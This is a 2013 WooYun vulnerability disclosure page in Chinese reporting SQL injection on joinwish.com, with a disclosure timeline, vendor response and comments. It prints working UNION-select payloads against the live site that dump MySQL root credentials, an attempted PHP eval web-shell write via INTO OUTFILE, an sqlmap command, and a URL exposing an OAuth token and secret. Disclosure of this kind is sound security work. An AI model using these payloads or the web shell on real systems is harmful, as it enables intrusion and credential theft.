当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034750

漏洞标题:好愿网主站SQL注射漏洞一枚

相关厂商:joinwish.com

漏洞作者: Hancock

提交时间:2013-08-19 18:30

修复时间:2013-10-03 18:31

公开时间:2013-10-03 18:31

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-19: 细节已通知厂商并且等待厂商处理中
2013-08-20: 厂商已经确认,细节仅向厂商公开
2013-08-30: 细节向核心白帽子及相关领域专家公开
2013-09-09: 细节向普通白帽子公开
2013-09-19: 细节向实习白帽子公开
2013-10-03: 细节向公众公开

简要描述:

好愿网SQL注射漏洞

详细说明:

注入点:
http://www.joinwish.com/wishsquare/index/val/1 手工不太会所以用sqlmap了
http://www.joinwish.com/wishgive2/index/new/Y/wish_id/10067768 手工注射
要先登录了然后才能注入、
ROOT权限:
http://www.joinwish.com/wishgive2/index/new/Y/wish_id/10067768+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,user(),18,19,20,21,22,23,24,25,26,database(),28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,version(),91,92,93,94,95,96,97,98

1.jpg


爆root账号密码:
http://www.joinwish.com/wishgive2/index/new/Y/wish_id/10067768+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,concat(user,0x7C,password),91,92,93,94,95,96,97,98+from+mysql.user

QQ截图20130819180711.jpg


爆路径,测试时,在new站登录莫名其妙弹出的,这是接口出错吧~?
http://new.joinwish.com/wishuser/wangyiadd/token/e8cb702cc66be06c428f31476bb7fbb5/secret/9c3192c03b979c88420e882da4a43322/?oauth_token=e8cb702cc66be06c428f31476bb7fbb5
然后想注入getshell的但是不成功
http://www.joinwish.com/wishgive2/index/new/Y/wish_id/10067768+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,"<?php eval($_POST[t]);?>" into outfile '/*****/*****/****/1.php'
,91,92,93,94,95,96,97,98+from+auth_user
这样对不对?
下面是sqlmap注入 好慢好慢 但同样是root权限的注入
sqlmap.py -u http://www.joinwish.com/wishsquare/index/val/1

3.jpg

漏洞证明:

修复方案:

求别重复

版权声明:转载请注明来源 Hancock@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-20 10:13

厂商回复:

该漏洞已与昨日修复

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-19 18:39 | Hancock ( 普通白帽子 | Rank:352 漏洞数:68 )

    审核的 谁教你的数学

  2. 2013-10-25 14:00 | Damo ( 普通白帽子 | Rank:209 漏洞数:31 | 我只是喜欢看加菲猫而已ส็็็็็็็็...)

    @Hancock @joinwish.com 修复 扯淡吧 漏洞依然存在